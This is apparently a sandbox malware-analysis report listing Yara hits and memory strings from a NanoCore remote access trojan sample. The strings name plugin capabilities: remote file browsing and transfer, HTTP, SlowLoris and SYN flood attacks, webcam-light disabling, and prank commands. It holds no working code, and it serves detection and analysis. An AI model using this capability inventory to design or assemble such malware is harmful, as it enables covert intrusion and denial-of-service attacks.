Source: Yara match	File source: 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 5016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 7456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dnshost.exe PID: 7800, type: MEMORYSTR

Remote Access Functionality

Detected Nanocore Rat

Source: nD2ozRD7MN.exe, 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: nD2ozRD7MN.exe, 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000045E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: nD2ozRD7MN.exe, 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: nD2ozRD7MN.exe, 00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: nD2ozRD7MN.exe, 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nD2ozRD7MN.exe, 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandl